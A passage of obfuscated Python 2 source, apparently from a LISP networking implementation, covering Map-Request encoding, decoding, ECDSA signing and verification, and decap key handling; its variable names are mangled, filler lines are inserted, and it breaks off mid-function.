self . target_group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . itr_rlocs = [ ]
self . keys = None
self . privkey_filename = None
self . map_request_signature = None
self . subscribe_bit = False
self . xtr_id = None
self . json_telemetry = None
if 64 - 64: Ii1I - iII111i
if 12 - 12: i1IIi
def print_prefix ( self ) :
if ( self . target_group . is_null ( ) ) :
return ( green ( self . target_eid . print_prefix ( ) , False ) )
if 99 - 99: II111iiii - I1ii11iIi11i * IiII
return ( green ( self . target_eid . print_sg ( self . target_group ) , False ) )
if 3 - 3: IiII - I1ii11iIi11i * iII111i * I1ii11iIi11i + Oo0Ooo
if 15 - 15: I1ii11iIi11i * Ii1I / iII111i . o0oOOo0O0Ooo / Ii1I % OoOoOO00
def print_map_request ( self ) :
IIiiII11i11I = ""
if ( self . xtr_id != None and self . subscribe_bit ) :
IIiiII11i11I = "subscribe, xtr-id: 0x{}, " . format ( lisp_hex_string ( self . xtr_id ) )
if 75 - 75: OoooooooOO % i11iIiiIii % iIii1I11I1II1 % I1ii11iIi11i / i11iIiiIii
if 96 - 96: ooOoO0o * oO0o / iIii1I11I1II1 / I11i
if 5 - 5: o0oOOo0O0Ooo
oOOo0ooO0 = ( "{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:" )
if 83 - 83: I11i * I1IiiI . II111iiii * i1IIi % O0
lprint ( oOOo0ooO0 . format ( bold ( "Map-Request" , False ) , "A" if self . auth_bit else "a" ,
# Ii1I % Oo0Ooo + OoO0O00
"D" if self . map_data_present else "d" ,
"R" if self . rloc_probe else "r" ,
"S" if self . smr_bit else "s" ,
"P" if self . pitr_bit else "p" ,
"I" if self . smr_invoked_bit else "i" ,
"M" if self . mobile_node else "m" ,
"X" if self . xtr_id_present else "x" ,
"L" if self . local_xtr else "l" ,
"D" if self . dont_reply_bit else "d" , self . itr_rloc_count ,
self . record_count , lisp_hex_string ( self . nonce ) ,
self . source_eid . afi , green ( self . source_eid . print_address ( ) , False ) ,
" (with sig)" if self . map_request_signature != None else "" ,
self . target_eid . afi , green ( self . print_prefix ( ) , False ) , IIiiII11i11I ) )
if 92 - 92: OOooOOo
iIi11III = self . keys
for OooO0OO0 in self . itr_rlocs :
if ( OooO0OO0 . afi == LISP_AFI_LCAF and self . json_telemetry != None ) :
continue
if 98 - 98: Oo0Ooo + OoOoOO00 * OOooOOo / iII111i * OoOoOO00 / OoooooooOO
IiI = red ( OooO0OO0 . print_address_no_iid ( ) , False )
lprint ( " itr-rloc: afi {} {}{}" . format ( OooO0OO0 . afi , IiI ,
"" if ( iIi11III == None ) else ", " + iIi11III [ 1 ] . print_keys ( ) ) )
iIi11III = None
if 68 - 68: iIii1I11I1II1
if ( self . json_telemetry != None ) :
lprint ( " itr-rloc: afi {} telemetry: {}" . format ( LISP_AFI_LCAF ,
self . json_telemetry ) )
if 51 - 51: OoOoOO00 + IiII
if 55 - 55: Oo0Ooo % I1Ii111 . II111iiii
if 53 - 53: O0 / OoO0O00 % i11iIiiIii
def sign_map_request ( self , privkey ) :
I1IiI11 = self . signature_eid . print_address ( )
i1i1Ii1iiII1I = self . source_eid . print_address ( )
IIIII11IIi = self . target_eid . print_address ( )
i11I1iiI1iI = lisp_hex_string ( self . nonce ) + i1i1Ii1iiII1I + IIIII11IIi
self . map_request_signature = privkey . sign ( i11I1iiI1iI )
i1i11 = binascii . b2a_base64 ( self . map_request_signature )
i1i11 = { "source-eid" : i1i1Ii1iiII1I , "signature-eid" : I1IiI11 ,
"signature" : i1i11 }
return ( json . dumps ( i1i11 ) )
if 77 - 77: iIii1I11I1II1 * OoOoOO00 + i11iIiiIii * ooOoO0o
if 81 - 81: Ii1I * iII111i % Ii1I % i11iIiiIii % i1IIi / o0oOOo0O0Ooo
def verify_map_request_sig ( self , pubkey ) :
oOO00oo = green ( self . signature_eid . print_address ( ) , False )
if ( pubkey == None ) :
lprint ( "Public-key not found for signature-EID {}" . format ( oOO00oo ) )
return ( False )
if 41 - 41: iII111i + I11i . oO0o - ooOoO0o . OoooooooOO
if 83 - 83: OoooooooOO * iIii1I11I1II1 . OoooooooOO / II111iiii . OoooooooOO - IiII
i1i1Ii1iiII1I = self . source_eid . print_address ( )
IIIII11IIi = self . target_eid . print_address ( )
i11I1iiI1iI = lisp_hex_string ( self . nonce ) + i1i1Ii1iiII1I + IIIII11IIi
pubkey = binascii . a2b_base64 ( pubkey )
if 90 - 90: Oo0Ooo % i11iIiiIii + O0 % O0
OoOoO00OoOOo = True
try :
o0Oo = ecdsa . VerifyingKey . from_pem ( pubkey )
except :
lprint ( "Invalid public-key in mapping system for sig-eid {}" . format ( self . signature_eid . print_address_no_iid ( ) ) )
if 64 - 64: Ii1I
OoOoO00OoOOo = False
if 55 - 55: I11i - I11i + ooOoO0o
if 87 - 87: OoooooooOO / OoOoOO00 . iIii1I11I1II1 / II111iiii
if ( OoOoO00OoOOo ) :
try :
OoOoO00OoOOo = o0Oo . verify ( self . map_request_signature , i11I1iiI1iI )
except :
OoOoO00OoOOo = False
if 27 - 27: i1IIi - iIii1I11I1II1 + O0 % Oo0Ooo / OOooOOo + i1IIi
if 48 - 48: Oo0Ooo
if 70 - 70: OoooooooOO * i11iIiiIii
O0Oo = bold ( "passed" if OoOoO00OoOOo else "failed" , False )
lprint ( "Signature verification {} for EID {}" . format ( O0Oo , oOO00oo ) )
return ( OoOoO00OoOOo )
if 58 - 58: I1ii11iIi11i * i11iIiiIii
if 47 - 47: O0 . I1IiiI / ooOoO0o % i11iIiiIii
def encode_json ( self , json_string ) :
OOOoooO000O0 = LISP_LCAF_JSON_TYPE
I1i = socket . htons ( LISP_AFI_LCAF )
iII = socket . htons ( len ( json_string ) + 4 )
IIIii1i11111 = socket . htons ( len ( json_string ) )
IiiiIi1iiii11 = struct . pack ( "HBBBBHH" , I1i , 0 , 0 , OOOoooO000O0 , 0 , iII ,
IIIii1i11111 )
IiiiIi1iiii11 += json_string
IiiiIi1iiii11 += struct . pack ( "H" , 0 )
return ( IiiiIi1iiii11 )
if 12 - 12: ooOoO0o % OoOoOO00
if 1 - 1: O0 / ooOoO0o
def encode ( self , probe_dest , probe_port ) :
i1OOoO0OO0oO = ( LISP_MAP_REQUEST << 28 ) | self . record_count
if 83 - 83: Ii1I / OoooooooOO * oO0o . I1IiiI . i1IIi
O00O00Oo = lisp_telemetry_configured ( ) if ( self . rloc_probe ) else None
if ( O00O00Oo != None ) : self . itr_rloc_count += 1
i1OOoO0OO0oO = i1OOoO0OO0oO | ( self . itr_rloc_count << 8 )
if 62 - 62: oO0o / Oo0Ooo
if ( self . auth_bit ) : i1OOoO0OO0oO |= 0x08000000
if ( self . map_data_present ) : i1OOoO0OO0oO |= 0x04000000
if ( self . rloc_probe ) : i1OOoO0OO0oO |= 0x02000000
if ( self . smr_bit ) : i1OOoO0OO0oO |= 0x01000000
if ( self . pitr_bit ) : i1OOoO0OO0oO |= 0x00800000
if ( self . smr_invoked_bit ) : i1OOoO0OO0oO |= 0x00400000
if ( self . mobile_node ) : i1OOoO0OO0oO |= 0x00200000
if ( self . xtr_id_present ) : i1OOoO0OO0oO |= 0x00100000
if ( self . local_xtr ) : i1OOoO0OO0oO |= 0x00004000
if ( self . dont_reply_bit ) : i1OOoO0OO0oO |= 0x00002000
if 10 - 10: O0 + iII111i + i11iIiiIii % iIii1I11I1II1 * iII111i * Oo0Ooo
IiiiIi1iiii11 = struct . pack ( "I" , socket . htonl ( i1OOoO0OO0oO ) )
IiiiIi1iiii11 += struct . pack ( "Q" , self . nonce )
if 55 - 55: i11iIiiIii
if 11 - 11: ooOoO0o . I1Ii111 - iII111i . o0oOOo0O0Ooo
if 41 - 41: oO0o / OoO0O00 - OoO0O00 + ooOoO0o * OOooOOo
if 13 - 13: I1Ii111 * II111iiii - OoOoOO00
if 3 - 3: OOooOOo + ooOoO0o * i11iIiiIii . iII111i / iIii1I11I1II1
if 44 - 44: OoO0O00
O00oO0ooooOOo = False
oo0i1ii = self . privkey_filename
if ( oo0i1ii != None and os . path . exists ( oo0i1ii ) ) :
I1ii1ii = open ( oo0i1ii , "r" ) ; o0Oo = I1ii1ii . read ( ) ; I1ii1ii . close ( )
try :
o0Oo = ecdsa . SigningKey . from_pem ( o0Oo )
except :
return ( None )
if 22 - 22: i11iIiiIii
o0Ooo = self . sign_map_request ( o0Oo )
O00oO0ooooOOo = True
elif ( self . map_request_signature != None ) :
i1i11 = binascii . b2a_base64 ( self . map_request_signature )
o0Ooo = { "source-eid" : self . source_eid . print_address ( ) ,
"signature-eid" : self . signature_eid . print_address ( ) ,
"signature" : i1i11 }
o0Ooo = json . dumps ( o0Ooo )
O00oO0ooooOOo = True
if 1 - 1: Ii1I - iIii1I11I1II1 * Ii1I . i11iIiiIii
if ( O00oO0ooooOOo ) :
IiiiIi1iiii11 += self . encode_json ( o0Ooo )
else :
if ( self . source_eid . instance_id != 0 ) :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
IiiiIi1iiii11 += self . source_eid . lcaf_encode_iid ( )
else :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( self . source_eid . afi ) )
IiiiIi1iiii11 += self . source_eid . pack_address ( )
if 96 - 96: Ii1I + iII111i - OoOoOO00 . I11i * o0oOOo0O0Ooo - Ii1I
if 73 - 73: Oo0Ooo - I11i - ooOoO0o / I1Ii111 * IiII
if 55 - 55: i1IIi / I1Ii111 . iII111i
if 98 - 98: i1IIi % O0 . ooOoO0o * O0
if 10 - 10: OOooOOo / Oo0Ooo - o0oOOo0O0Ooo / ooOoO0o % ooOoO0o / OoooooooOO
if 26 - 26: Oo0Ooo . i1IIi / i11iIiiIii + I1Ii111 / II111iiii - I1ii11iIi11i
if 71 - 71: iIii1I11I1II1 + O0 . IiII . iII111i % o0oOOo0O0Ooo % O0
if ( probe_dest ) :
if ( probe_port == 0 ) : probe_port = LISP_DATA_PORT
oo0o00OO = probe_dest . print_address_no_iid ( ) + ":" + str ( probe_port )
if 51 - 51: o0oOOo0O0Ooo - Ii1I - iIii1I11I1II1 * iIii1I11I1II1 * o0oOOo0O0Ooo - O0
if ( lisp_crypto_keys_by_rloc_encap . has_key ( oo0o00OO ) ) :
self . keys = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ]
if 27 - 27: i1IIi . I1Ii111
if 64 - 64: ooOoO0o / i1IIi
if 100 - 100: II111iiii
if 16 - 16: Ii1I
if 96 - 96: o0oOOo0O0Ooo / I1Ii111 % Ii1I - ooOoO0o
if 35 - 35: OOooOOo
if 90 - 90: i11iIiiIii
for OooO0OO0 in self . itr_rlocs :
if ( lisp_data_plane_security and self . itr_rlocs . index ( OooO0OO0 ) == 0 ) :
if ( self . keys == None or self . keys [ 1 ] == None ) :
iIi11III = lisp_keys ( 1 )
self . keys = [ None , iIi11III , None , None ]
if 47 - 47: OoO0O00 . i11iIiiIii
iIi11III = self . keys [ 1 ]
iIi11III . add_key_by_nonce ( self . nonce )
IiiiIi1iiii11 += iIi11III . encode_lcaf ( OooO0OO0 )
else :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( OooO0OO0 . afi ) )
IiiiIi1iiii11 += OooO0OO0 . pack_address ( )
if 9 - 9: OoOoOO00 - I11i . OoooooooOO % ooOoO0o
if 13 - 13: OoO0O00 * iIii1I11I1II1 + II111iiii - Oo0Ooo - OoOoOO00
if 43 - 43: iII111i / I1Ii111 * I1IiiI % ooOoO0o % I1IiiI
if 18 - 18: OoO0O00
if 99 - 99: iII111i / oO0o . i11iIiiIii / I11i + i1IIi - I11i
if 50 - 50: i1IIi
if ( O00O00Oo != None ) :
i1 = str ( time . time ( ) )
O00O00Oo = lisp_encode_telemetry ( O00O00Oo , io = i1 )
self . json_telemetry = O00O00Oo
IiiiIi1iiii11 += self . encode_json ( O00O00Oo )
if 56 - 56: OoO0O00 + I1Ii111 / Ii1I
if 75 - 75: OoOoOO00
oO00OO0Ooo00O = 0 if self . target_eid . is_binary ( ) == False else self . target_eid . mask_len
if 45 - 45: OoO0O00 * II111iiii * OoOoOO00 - OOooOOo % oO0o - Oo0Ooo
if 4 - 4: o0oOOo0O0Ooo . OoOoOO00 - iIii1I11I1II1 / IiII / I1IiiI % I1IiiI
Iiii1I = 0
if ( self . subscribe_bit ) :
Iiii1I = 0x80
self . xtr_id_present = True
if ( self . xtr_id == None ) :
self . xtr_id = random . randint ( 0 , ( 2 ** 128 ) - 1 )
if 26 - 26: Oo0Ooo + OoooooooOO - OOooOOo * II111iiii / iII111i
if 77 - 77: I11i
if 50 - 50: o0oOOo0O0Ooo - OoOoOO00
O0O00Oo = "BB"
IiiiIi1iiii11 += struct . pack ( O0O00Oo , Iiii1I , oO00OO0Ooo00O )
if 1 - 1: i1IIi / Ii1I % IiII - I11i % o0oOOo0O0Ooo
if ( self . target_group . is_null ( ) == False ) :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
IiiiIi1iiii11 += self . target_eid . lcaf_encode_sg ( self . target_group )
elif ( self . target_eid . instance_id != 0 or
self . target_eid . is_geo_prefix ( ) ) :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
IiiiIi1iiii11 += self . target_eid . lcaf_encode_iid ( )
else :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( self . target_eid . afi ) )
IiiiIi1iiii11 += self . target_eid . pack_address ( )
if 28 - 28: ooOoO0o - IiII + iII111i . ooOoO0o % OoooooooOO
if 17 - 17: OOooOOo / iII111i / IiII / OoO0O00 . I11i / o0oOOo0O0Ooo
if 1 - 1: iIii1I11I1II1 + IiII % ooOoO0o + O0 / iIii1I11I1II1 % OoO0O00
if 83 - 83: i11iIiiIii * II111iiii . i1IIi * I1Ii111
if 48 - 48: iIii1I11I1II1
if ( self . subscribe_bit ) : IiiiIi1iiii11 = self . encode_xtr_id ( IiiiIi1iiii11 )
return ( IiiiIi1iiii11 )
if 69 - 69: OoOoOO00 - OoO0O00 - iIii1I11I1II1 % Oo0Ooo - I1Ii111
if 77 - 77: oO0o % O0 % O0 - iII111i - iII111i - I1IiiI
def lcaf_decode_json ( self , packet ) :
O0O00Oo = "BBBBHH"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 37 - 37: iIii1I11I1II1
iI1i , O0OooO00O0 , OOOoooO000O0 , iiI1i111I1 , iII , IIIii1i11111 = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if 26 - 26: OoooooooOO . i1IIi + OoO0O00
if 42 - 42: i11iIiiIii * o0oOOo0O0Ooo % I11i % Oo0Ooo + o0oOOo0O0Ooo * i11iIiiIii
if ( OOOoooO000O0 != LISP_LCAF_JSON_TYPE ) : return ( packet )
if 66 - 66: Ii1I / IiII . OoooooooOO * Oo0Ooo % i11iIiiIii
if 100 - 100: I1ii11iIi11i % II111iiii * i11iIiiIii - iII111i
if 69 - 69: OOooOOo + iII111i / I1Ii111
if 37 - 37: iIii1I11I1II1 * I11i / IiII * Oo0Ooo % i11iIiiIii
iII = socket . ntohs ( iII )
IIIii1i11111 = socket . ntohs ( IIIii1i11111 )
packet = packet [ IiIii1i : : ]
if ( len ( packet ) < iII ) : return ( None )
if ( iII != IIIii1i11111 + 2 ) : return ( None )
if 93 - 93: ooOoO0o + ooOoO0o
if 65 - 65: OoooooooOO * I11i * oO0o % I1ii11iIi11i * II111iiii
if 86 - 86: i11iIiiIii / I11i * iII111i - iII111i
if 32 - 32: Oo0Ooo . O0
o0Ooo = packet [ 0 : IIIii1i11111 ]
packet = packet [ IIIii1i11111 : : ]
if 48 - 48: I1ii11iIi11i % II111iiii + I11i
if 25 - 25: IiII * o0oOOo0O0Ooo / I1IiiI . IiII % II111iiii
if 50 - 50: OoOoOO00 * iII111i
if 59 - 59: I1IiiI * I1IiiI / I11i
if ( lisp_is_json_telemetry ( o0Ooo ) != None ) :
self . json_telemetry = o0Ooo
if 92 - 92: o0oOOo0O0Ooo
if 8 - 8: iII111i + I1ii11iIi11i . Ii1I
if 50 - 50: Oo0Ooo
if 16 - 16: Ii1I - OoOoOO00 % Oo0Ooo / Ii1I . I11i + ooOoO0o
if 78 - 78: iIii1I11I1II1 + OoO0O00 + i11iIiiIii
O0O00Oo = "H"
IiIii1i = struct . calcsize ( O0O00Oo )
IiiiII = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] ) [ 0 ]
packet = packet [ IiIii1i : : ]
if ( IiiiII != 0 ) : return ( packet )
if 21 - 21: Oo0Ooo + Ii1I % ooOoO0o + OoOoOO00 % I11i
if ( self . json_telemetry != None ) : return ( packet )
if 22 - 22: i1IIi / OoooooooOO . OoO0O00
if 83 - 83: I1IiiI - OoooooooOO + I1ii11iIi11i . Ii1I / o0oOOo0O0Ooo + ooOoO0o
if 90 - 90: I1IiiI - i11iIiiIii
if 42 - 42: OOooOOo . Oo0Ooo
try :
o0Ooo = json . loads ( o0Ooo )
except :
return ( None )
if 21 - 21: iII111i . I1IiiI / I11i
if 97 - 97: iIii1I11I1II1 + i1IIi - o0oOOo0O0Ooo
if 73 - 73: OoO0O00 - i11iIiiIii % I1Ii111 / Oo0Ooo - OoooooooOO % OOooOOo
if 79 - 79: I1IiiI / o0oOOo0O0Ooo . Ii1I * I1ii11iIi11i + I11i
if 96 - 96: OoO0O00 * II111iiii
if ( o0Ooo . has_key ( "source-eid" ) == False ) : return ( packet )
iiI1I1IIi = o0Ooo [ "source-eid" ]
IiiiII = LISP_AFI_IPV4 if iiI1I1IIi . count ( "." ) == 3 else LISP_AFI_IPV6 if iiI1I1IIi . count ( ":" ) == 7 else None
if 44 - 44: I11i
if ( IiiiII == None ) :
lprint ( "Bad JSON 'source-eid' value: {}" . format ( iiI1I1IIi ) )
return ( None )
if 3 - 3: iIii1I11I1II1 - i1IIi / iII111i + i1IIi + O0
if 18 - 18: iIii1I11I1II1 . iII111i % OOooOOo % oO0o + iIii1I11I1II1 * OoooooooOO
self . source_eid . afi = IiiiII
self . source_eid . store_address ( iiI1I1IIi )
if 78 - 78: IiII
if ( o0Ooo . has_key ( "signature-eid" ) == False ) : return ( packet )
iiI1I1IIi = o0Ooo [ "signature-eid" ]
if ( iiI1I1IIi . count ( ":" ) != 7 ) :
lprint ( "Bad JSON 'signature-eid' value: {}" . format ( iiI1I1IIi ) )
return ( None )
if 38 - 38: OoO0O00 * I1ii11iIi11i
if 4 - 4: OoO0O00 . I1ii11iIi11i
self . signature_eid . afi = LISP_AFI_IPV6
self . signature_eid . store_address ( iiI1I1IIi )
if 21 - 21: i11iIiiIii / OoO0O00 / I1ii11iIi11i * O0 - II111iiii * OOooOOo
if ( o0Ooo . has_key ( "signature" ) == False ) : return ( packet )
i1i11 = binascii . a2b_base64 ( o0Ooo [ "signature" ] )
self . map_request_signature = i1i11
return ( packet )
if 27 - 27: o0oOOo0O0Ooo . OoOoOO00 * Ii1I * iII111i * O0
if 93 - 93: IiII % I1Ii111 % II111iiii
def decode ( self , packet , source , port ) :
O0O00Oo = "I"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 20 - 20: OoooooooOO * I1Ii111
i1OOoO0OO0oO = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
i1OOoO0OO0oO = i1OOoO0OO0oO [ 0 ]
packet = packet [ IiIii1i : : ]
if 38 - 38: iII111i . OoooooooOO
O0O00Oo = "Q"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 28 - 28: I1Ii111 * i1IIi . I1ii11iIi11i
o0OOO = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
packet = packet [ IiIii1i : : ]
if 75 - 75: O0 / oO0o * ooOoO0o - OOooOOo / i1IIi
i1OOoO0OO0oO = socket . ntohl ( i1OOoO0OO0oO )
self . auth_bit = True if ( i1OOoO0OO0oO & 0x08000000 ) else False
self . map_data_present = True if ( i1OOoO0OO0oO & 0x04000000 ) else False
self . rloc_probe = True if ( i1OOoO0OO0oO & 0x02000000 ) else False
self . smr_bit = True if ( i1OOoO0OO0oO & 0x01000000 ) else False
self . pitr_bit = True if ( i1OOoO0OO0oO & 0x00800000 ) else False
self . smr_invoked_bit = True if ( i1OOoO0OO0oO & 0x00400000 ) else False
self . mobile_node = True if ( i1OOoO0OO0oO & 0x00200000 ) else False
self . xtr_id_present = True if ( i1OOoO0OO0oO & 0x00100000 ) else False
self . local_xtr = True if ( i1OOoO0OO0oO & 0x00004000 ) else False
self . dont_reply_bit = True if ( i1OOoO0OO0oO & 0x00002000 ) else False
self . itr_rloc_count = ( ( i1OOoO0OO0oO >> 8 ) & 0x1f )
self . record_count = i1OOoO0OO0oO & 0xff
self . nonce = o0OOO [ 0 ]
if 61 - 61: I11i
if 100 - 100: O0 - iIii1I11I1II1 * Oo0Ooo
if 35 - 35: ooOoO0o
if 57 - 57: OoO0O00 . Oo0Ooo + I1IiiI
if ( self . xtr_id_present ) :
if ( self . decode_xtr_id ( packet ) == False ) : return ( None )
if 18 - 18: I1IiiI - I1ii11iIi11i * I11i / i11iIiiIii - o0oOOo0O0Ooo % o0oOOo0O0Ooo
if 31 - 31: I11i
IiIii1i = struct . calcsize ( "H" )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 100 - 100: i11iIiiIii * i11iIiiIii . iIii1I11I1II1 % iII111i * I1ii11iIi11i
IiiiII = struct . unpack ( "H" , packet [ : IiIii1i ] )
self . source_eid . afi = socket . ntohs ( IiiiII [ 0 ] )
packet = packet [ IiIii1i : : ]
if 17 - 17: Ii1I * IiII * i11iIiiIii / I1ii11iIi11i / i11iIiiIii
if ( self . source_eid . afi == LISP_AFI_LCAF ) :
IiiiiI = packet
packet = self . source_eid . lcaf_decode_iid ( packet )
if ( packet == None ) :
packet = self . lcaf_decode_json ( IiiiiI )
if ( packet == None ) : return ( None )
if 5 - 5: iII111i * ooOoO0o + IiII . I1IiiI / I1IiiI
elif ( self . source_eid . afi != LISP_AFI_NONE ) :
packet = self . source_eid . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 72 - 72: OoO0O00 / I1ii11iIi11i - OOooOOo - OoooooooOO / OoooooooOO % OoooooooOO
self . source_eid . mask_len = self . source_eid . host_mask_len ( )
if 85 - 85: OoO0O00 . o0oOOo0O0Ooo . I1IiiI
Oo000o0o0 = ( os . getenv ( "LISP_NO_CRYPTO" ) != None )
self . itr_rlocs = [ ]
oOO0ooOoOoOo = self . itr_rloc_count + 1
if 91 - 91: IiII - I1ii11iIi11i - I1Ii111
while ( oOO0ooOoOoOo != 0 ) :
IiIii1i = struct . calcsize ( "H" )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 35 - 35: iIii1I11I1II1 . O0 + OoOoOO00 / OoO0O00 / IiII * II111iiii
IiiiII = socket . ntohs ( struct . unpack ( "H" , packet [ : IiIii1i ] ) [ 0 ] )
OooO0OO0 = lisp_address ( LISP_AFI_NONE , "" , 32 , 0 )
OooO0OO0 . afi = IiiiII
if 32 - 32: I1Ii111 - iIii1I11I1II1 / I11i * OoO0O00 * OoO0O00
if 77 - 77: I1ii11iIi11i
if 16 - 16: II111iiii - II111iiii * I11i / OOooOOo . IiII
if 36 - 36: I11i / iIii1I11I1II1
if 59 - 59: i1IIi
if ( OooO0OO0 . afi == LISP_AFI_LCAF ) :
oO0ooOoOooO00o00 = packet
O0OoO0O = packet [ IiIii1i : : ]
packet = self . lcaf_decode_json ( O0OoO0O )
if ( packet == O0OoO0O ) : packet = oO0ooOoOooO00o00
if 75 - 75: O0 . I11i - Ii1I / I1Ii111 / I1ii11iIi11i % I11i
if 97 - 97: OoOoOO00 - OoO0O00
if 64 - 64: i1IIi / OoooooooOO / I1ii11iIi11i - Oo0Ooo + oO0o
if 6 - 6: OOooOOo % II111iiii * IiII
if 34 - 34: I11i % iII111i - ooOoO0o - I1IiiI
if 44 - 44: Ii1I . o0oOOo0O0Ooo . iIii1I11I1II1 + OoooooooOO - I1IiiI
if ( OooO0OO0 . afi != LISP_AFI_LCAF ) :
if ( len ( packet ) < OooO0OO0 . addr_length ( ) ) : return ( None )
packet = OooO0OO0 . unpack_address ( packet [ IiIii1i : : ] )
if ( packet == None ) : return ( None )
if 22 - 22: I11i * I1ii11iIi11i . OoooooooOO / Oo0Ooo / Ii1I
if ( Oo000o0o0 ) :
self . itr_rlocs . append ( OooO0OO0 )
oOO0ooOoOoOo -= 1
continue
if 54 - 54: I1Ii111 % Ii1I + ooOoO0o
if 45 - 45: Ii1I / oO0o * I1Ii111 . Ii1I
oo0o00OO = lisp_build_crypto_decap_lookup_key ( OooO0OO0 , port )
if 25 - 25: I1ii11iIi11i / I1ii11iIi11i
if 79 - 79: Oo0Ooo - OoO0O00 % Oo0Ooo . II111iiii
if 84 - 84: ooOoO0o * OoooooooOO + O0
if 84 - 84: i1IIi . I11i . i1IIi . Oo0Ooo
if 21 - 21: II111iiii . O0 + Oo0Ooo - i11iIiiIii
if ( lisp_nat_traversal and OooO0OO0 . is_private_address ( ) and source ) : OooO0OO0 = source
if 5 - 5: iIii1I11I1II1 * i11iIiiIii + OoO0O00 + I11i * O0 % ooOoO0o
oO0oooo0 = lisp_crypto_keys_by_rloc_decap
if ( oO0oooo0 . has_key ( oo0o00OO ) ) : oO0oooo0 . pop ( oo0o00OO )
if 66 - 66: i1IIi % OoooooooOO * i11iIiiIii + oO0o * O0 / OoO0O00
if 14 - 14: I1IiiI . IiII
if 29 - 29: OoooooooOO / IiII + OoOoOO00 - I1Ii111 + IiII . i1IIi
if 26 - 26: i11iIiiIii - II111iiii
if 43 - 43: I1IiiI
if 35 - 35: ooOoO0o + OoOoOO00 * OoooooooOO - II111iiii
lisp_write_ipc_decap_key ( oo0o00OO , None )
if 19 - 19: i1IIi / Ii1I / OoOoOO00 . I1IiiI / Ii1I % o0oOOo0O0Ooo
elif ( self . json_telemetry == None ) :
if 39 - 39: ooOoO0o - OoooooooOO
if 88 - 88: i1IIi + iIii1I11I1II1 * i11iIiiIii - OoooooooOO % o0oOOo0O0Ooo
if 74 - 74: ooOoO0o - i11iIiiIii
if 34 - 34: IiII + I1Ii111 + Oo0Ooo / II111iiii
oO0ooOoOooO00o00 = packet
I1 = lisp_keys ( 1 )
packet = I1 . decode_lcaf ( oO0ooOoOooO00o00 , 0 )
if 59 - 59: II111iiii - OoO0O00
if ( packet == None ) : return ( None )
if 31 - 31: I11i - OoOoOO00 / o0oOOo0O0Ooo * OoOoOO00 / Oo0Ooo + o0oOOo0O0Ooo
if 46 - 46: IiII * OoO0O00 / OOooOOo + Oo0Ooo
if 24 - 24: ooOoO0o % OOooOOo . O0 * Oo0Ooo
if 52 - 52: O0 . I1Ii111 + iII111i / i11iIiiIii
o0OOoOoo = [ LISP_CS_25519_CBC , LISP_CS_25519_GCM ,
LISP_CS_25519_CHACHA ]
if ( I1 . cipher_suite in o0OOoOoo ) :
if ( I1 . cipher_suite == LISP_CS_25519_CBC or
I1 . cipher_suite == LISP_CS_25519_GCM ) :
o0Oo = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 52 - 52: oO0o % Oo0Ooo * II111iiii
if ( I1 . cipher_suite == LISP_CS_25519_CHACHA ) :
o0Oo = lisp_keys ( 1 , do_poly = True , do_chacha = True )
if 24 - 24: i11iIiiIii * i1IIi * i1IIi
else :
o0Oo = lisp_keys ( 1 , do_poly = False , do_curve = False ,
do_chacha = False )
if 27 - 27: i1IIi - oO0o + OOooOOo
packet = o0Oo . decode_lcaf ( oO0ooOoOooO00o00 , 0 )
if ( packet == None ) : return ( None )
if 3 - 3: IiII % I1Ii111 . OoooooooOO
if ( len ( packet ) < IiIii1i ) : return ( None )
IiiiII = struct . unpack ( "H" , packet [ : IiIii1i ] ) [ 0 ]
OooO0OO0 . afi = socket . ntohs ( IiiiII )
if ( len ( packet ) < OooO0OO0 . addr_length ( ) ) : return ( None )
if 19 - 19: I1Ii111 * Ii1I - oO0o
packet = OooO0OO0 . unpack_address ( packet [ IiIii1i : : ] )
if ( packet == None ) : return ( None )
if 78 - 78: OoO0O00 - Ii1I / OOooOOo
if ( Oo000o0o0 ) :
self . itr_rlocs . append ( OooO0OO0 )
oOO0ooOoOoOo -= 1
continue
if 81 - 81: OoOoOO00
if 21 - 21: iII111i / OOooOOo % IiII
oo0o00OO = lisp_build_crypto_decap_lookup_key ( OooO0OO0 , port )
if 51 - 51: I11i + ooOoO0o / I1IiiI
Ii11i = None
if ( lisp_nat_traversal and OooO0OO0 . is_private_address ( ) and source ) : OooO0OO0 = source
if 65 - 65: Ii1I % OoO0O00 - i11iIiiIii % Oo0Ooo
if 19 - 19: O0
if ( lisp_crypto_keys_by_rloc_decap . has_key ( oo0o00OO ) ) :
iIi11III = lisp_crypto_keys_by_rloc_decap [ oo0o00OO ]
Ii11i = iIi11III [ 1 ] if iIi11III and iIi11III [ 1 ] else None
if 77 - 77: IiII * OoooooooOO . I1ii11iIi11i % Ii1I
if 51 - 51: I1ii11iIi11i % OoooooooOO - OoooooooOO . I11i
Ooo00O0ooOo = True
if ( Ii11i ) :
if ( Ii11i . compare_keys ( o0Oo ) ) :
self . keys = [ None , Ii11i , None , None ]
lprint ( "Maintain stored decap-keys for RLOC {}" . format ( red ( oo0o00OO , False ) ) )
if 4 - 4: OOooOOo - ooOoO0o - Ii1I . I1IiiI * ooOoO0o
else :
Ooo00O0ooOo = False
o0OOo = bold ( "Remote decap-rekeying" , False )
